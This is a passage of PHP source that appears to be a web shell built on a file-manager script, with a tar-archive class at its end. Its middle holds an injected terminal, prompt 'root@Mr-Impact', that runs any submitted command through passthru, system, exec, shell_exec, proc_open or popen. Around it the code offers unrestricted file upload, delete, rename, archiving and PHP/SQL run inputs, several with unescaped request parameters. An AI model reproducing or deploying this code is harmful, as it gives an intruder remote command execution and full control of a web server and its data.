        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		$msg_ntimes .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];
	}
	clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php

} else {
                       
//quanxian gai bian hou xu yao xi tong chongqi
                    
    $msg_ntimes = '';

    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                $msg_ntimes .= __('Error occurred');
                      
            } else {

		     		     $msg_ntimes .= __('Files uploaded').': '.$_FILES['upload']['name'];

		     	}
                       
        }
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!fm_del_khumfail(($path . $_REQUEST['delete']), true)) {
            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	$msg_ntimes .= __('Deleted').' '.$_REQUEST['delete'];
		     }
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
                      
            $msg_ntimes .= __('Error occurred');
        } else {
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['dirname'];
		     }

    } elseif(!empty($_POST['search_recursive'])) {
		     ini_set('max_execution_time', '0');
		     $search_data =  find_text_in_khumfail($_POST['path'], $_POST['mask'], $_POST['search_recursive']);

		     if(!empty($search_data)) {
                       
		     	$msg_ntimes .= __('Found in khumfail').' ('.count($search_data).'):<br>';

		     	foreach ($search_data as $filename) {
                    
		     		     $msg_ntimes .= '<a href="'.thangweb(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

		     	}
		     } else {
		     	$msg_ntimes .= __('Nothing founded');

		     }	

	} elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {

        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	fclose($fp);
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['filename'];
		     }

    } elseif (isset($_GET['zip'])) {
		     $source = base64_decode($_GET['zip']);
		     $destination = basename($source).'.zip';
                      
		     set_time_limit(0);

		     $phar = new PharData($destination);

		     $phar->buildFromDirectory($source);
                      
		     if (is_file($destination))
                     
		     $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     '.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		     .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';

		     else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['gz'])) {

		     $source = base64_decode($_GET['gz']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
		     if (is_file($archive)) unlink($archive);

		     if (is_file($archive.'.gz')) unlink($archive.'.gz');
                       
		     clearstatcache();

		     set_time_limit(0);

		     //die();
		     $phar = new PharData($destination);
		     $phar->buildFromDirectory($source);

		     $phar->compress(Phar::GZ,'.tar.gz');
		     unset($phar);
		     if (is_file($archive)) {

		     	if (is_file($archive.'.gz')) {
		     		     unlink($archive); 
		     		     $destination .= '.gz';

		     	}


                       
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                       
		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['decompress'])) {

		     // $source = base64_decode($_GET['decompress']);
		     // $destination = basename($source);
                     
		     // $ext = end(explode(".", $destination));

		     // if ($ext=='zip' OR $ext=='gz') {

		     	// $phar = new PharData($source);

		     	// $phar->decompress();
                     
		     	// $base_file = str_replace('.'.$ext,'',$destination);

		     	// $ext = end(explode(".", $base_file));

		     	// if ($ext=='tar'){
		     		     // $phar = new PharData($base_file);
                    
		     		     // $phar->extractTo(dir($source));

		     	// }

		     // } 

		     // $msg_ntimes .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	} elseif (isset($_GET['gzfile'])) {

		     $source = base64_decode($_GET['gzfile']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
                     
		     if (is_file($archive)) unlink($archive);
		     if (is_file($archive.'.gz')) unlink($archive.'.gz');

		     set_time_limit(0);
		     //echo $destination;
                       
		     $ext_arr = explode('.',basename($source));
		     if (isset($ext_arr[1])) {
                     
		     	unset($ext_arr[0]);

		     	$ext=implode('.',$ext_arr);
		     } 

		     $phar = new PharData($destination);

		     $phar->addFile($source);

		     $phar->compress(Phar::GZ,$ext.'.tar.gz');

		     unset($phar);

		     if (is_file($archive)) {
		     	if (is_file($archive.'.gz')) {

		     		     unlink($archive); 

		     		     $destination .= '.gz';

		     	}
                    
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)

		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	}
                      
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg_ntimes)){ ?>
<tr>
	<td colspan="2" class="row2"><?=$msg_ntimes?></td>
</tr>
<?php } ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
<?php
session_start();

// Allowed functions
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];

// Check if at least one is available
$canExecute = false;
foreach ($execFunctions as $func) {
    if (function_exists($func)) {
        $canExecute = true;
        break;
    }
}

// Initialize cwd
if (!isset($_SESSION['cwd'])) {
    $_SESSION['cwd'] = getcwd();
}

// Change directory if POSTed
if (isset($_POST['path']) && is_dir($_POST['path'])) {
    $_SESSION['cwd'] = realpath($_POST['path']);
}

$cwd = $_SESSION['cwd'];
$output = "";

// Process terminal input
if (isset($_POST['terminal'])) {
    $cmdInput = trim($_POST['terminal-text']);

    // Handle cd
    if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
        $dir = trim($matches[1]);

        if ($dir === '' || $dir === '~') {
            $dir = $_SERVER['DOCUMENT_ROOT'] ?? $cwd;
        } elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
            $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
        }

        $realDir = realpath($dir);

        if ($realDir && is_dir($realDir)) {
            $_SESSION['cwd'] = $realDir;
            $cwd = $realDir;
            $output = "Changed directory to " . htmlspecialchars($realDir);
        } else {
            $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
        }

    } else {

        if ($canExecute) {

            // Change working directory
            chdir($cwd);

            // Allow safe characters; do NOT break arguments
            $cmd = $cmdInput . " 2>&1";

            // PRIORITY: passthru first
            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();

            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();

            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);

            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);

            } elseif (function_exists('proc_open')) {
                $pipes = [];
                $process = proc_open($cmd, [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ], $pipes, $cwd);

                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                } else {
                    $output = "Failed to execute command via proc_open.";
                }

            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                } else {
                    $output = "Failed to execute command via popen.";
                }

            } else {
                $output = "Error: No command execution functions available.";
            }

        } else {
            $output = "Command execution functions are disabled on this server.";
        }
    }
}

if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER['PHP_SELF']);
if (!isset($path)) $path = $cwd;
?>

<strong>root@Mr-Impact:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>

<form method="post" action="<?php echo $url_inc; ?>">
    <input type="text" name="terminal-text" size="30" placeholder="Cmd" />
    <input type="hidden" name="path" value="<?php echo htmlspecialchars($path); ?>" />
    <input type="submit" name="terminal" value="Execute" />
</form>


</td>
			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path"     value="<?=$path?>" />
				<input type="text"   name="filename" size="15">
				<input type="submit" name="mkfile"   value="<?=__('New file')?>">
				</form>
			<?php } ?>
			</td>
			<td>
				<form  method="post" action="<?=$url_inc?>" style="display:inline">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
				<input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
				<input type="submit" name="search" value="<?=__('Search')?>">
				</form>
			</td>
			<td>
			<?=fm_run_input('php')?>
			</td>
			<td>
			<?=fm_run_input('sql')?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		     <td>

		     <?php if (!empty($fm_config['upload_file'])) { ?>
                      
		     	<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
                    
		     	<input type="hidden" name="path" value="<?=$path?>" />

		     	<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

		     	<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
                       
		     	<input type="submit" name="test" value="<?=__('Upload')?>" />

		     	</form>

		     <?php } ?>
                    
		     </td>
		<td>
		<?php if ($auth['authorize']) { ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';
		 if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
		$link = 
			$fm_config['show_img']&&@getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
			. fm_img_link($filename)
			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		$e_arr = explode(".", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''
		: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
        $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().' | ver. '.$fm_version.' | <a href="https://">Github</a>  | <a href="'.fm_site_url().'">.</a>';
	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>


<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.'.tmp')){
					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';
			foreach ($Errors as $value)
				$message .= $value.'<br/>';
			return $message;	
		} else return '';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;
			return false;
		}
		$filename = str_replace('\\', '/', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != ''){
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header
				$filename = '';
				$decr = floor($header['size']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')){
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];
			}
			
			if (file_exists($header['filename'])){
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5'){
				if (!file_exists($header['filename']))		{
					if (!mkdir($header['filename'], 0777))	{
						
						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file').' '.$header['filename'];
					return false;
				} else {
					$decr = floor($header['size']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header['filename'] = '';
			$this->__('Invalid block size').': '.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum){
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(' ');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)){
			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == '.'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..'){
                    $i--;
                }
				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }	else
